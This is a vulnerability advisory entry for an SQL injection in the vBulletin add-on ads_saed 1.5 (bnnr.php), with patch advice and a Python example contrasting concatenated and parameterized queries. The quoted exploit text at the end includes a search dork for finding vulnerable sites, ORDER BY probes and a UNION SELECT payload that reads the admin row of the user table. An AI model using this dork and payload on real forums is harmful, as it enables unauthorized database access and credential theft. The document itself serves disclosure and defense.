Vendor: ads_saed
By: Hussin X
CVSS: 7.5 (HIGH)
Vulnerability: SQL Injection
CWE: 89
Product Name: ads_saed
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability

A vulnerability exists in vBulletin ads_saed 1.5 (bnnr.php) which allows an attacker to inject malicious SQL queries into the application. An attacker can exploit this vulnerability by sending a specially crafted request to the vulnerable application. This can allow the attacker to gain access to sensitive information stored in the database.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should update to the latest version of the application.
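
Beyond applying the vendor patch, the general fix for this class of bug is to bind the "user name" value as a query parameter instead of splicing it into the SQL text. The following is an added example, not code from ads_saed or from the original advisory: it uses Python with an in-memory SQLite table (a constructed 15-column stand-in; the real add-on is PHP on MySQL, and the table, column and function names here are hypothetical) to compare how the two ORDER BY values quoted in the advisory below behave against a concatenated query and a bound one.

```python
import sqlite3

def make_db():
    """Constructed stand-in table with 15 columns (SQLite, not the add-on's MySQL schema)."""
    db = sqlite3.connect(":memory:")
    extra = ", ".join(f"c{i} TEXT" for i in range(2, 16))  # c2..c15
    db.execute(f"CREATE TABLE banner (owner TEXT, {extra})")
    db.execute("INSERT INTO banner (owner) VALUES ('o''brien')")
    return db

def lookup_concat(db, name):
    """Hypothetical 'before' pattern: the form value is spliced into the SQL text."""
    return db.execute("SELECT * FROM banner WHERE owner = '" + name + "'").fetchall()

def lookup_bound(db, name):
    """Hardened pattern: the value is bound as data and never parsed as SQL."""
    return db.execute("SELECT * FROM banner WHERE owner = ?", (name,)).fetchall()

def outcome(lookup, db, name):
    """Return ('rows', n) or ('sql-error', message) for one submitted value."""
    try:
        return ("rows", len(lookup(db, name)))
    except sqlite3.OperationalError as exc:
        return ("sql-error", str(exc))

# Values taken from the advisory text, plus one legitimate name containing a quote.
PROBES = ["' ORDER BY 15/*", "' ORDER BY 16/*", "o'brien"]

def compare(db):
    """Map each submitted value to its (concatenated, bound) outcome kinds."""
    return {p: (outcome(lookup_concat, db, p)[0], outcome(lookup_bound, db, p)[0])
            for p in PROBES}

if __name__ == "__main__":
    db = make_db()
    for probe in PROBES:
        print(repr(probe))
        print("  concatenated:", outcome(lookup_concat, db, probe))
        print("  bound       :", outcome(lookup_bound, db, probe))
```

With the concatenated query the two ORDER BY values give different outcomes (no rows, then an SQL error), which is the difference the advisory reads from the page source; with the bound query both are treated as a literal name that matches nothing, and the legitimate name containing a quote is found instead of breaking the statement.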

Exploit-DB raw data:

vBulletin ads_saed 1.5 (bnnr.php) SQL Injection Vulnerability
___________________________________

Author: Hussin X

Home : www.IQ-TY.com

Mail : darkangel_G85@yahoo.com
___________________________________

## script name : ads_saed

## d0rk : inurl:"vb/bnnr.php"

## Example :


Go to url : http://server/vb/bnnr.php

Exploit in the input "user name" blind injection

user name = ' ORDER BY 15/*

user name = ' ORDER BY 16/*

Now go to Source page  :  " Unknown column '16' in 'order clause'"


exploit :

user name =
' UNION SELECT 1,2,3,4,5,4,7,8,9,10,11,12,13,14,15 FROM user where+userid=1/*



# Solution : See here

http://www.traidnt.net/vb/showthread.php?t=1102593

or update new Product



End

IQ-SecuritY FoRuM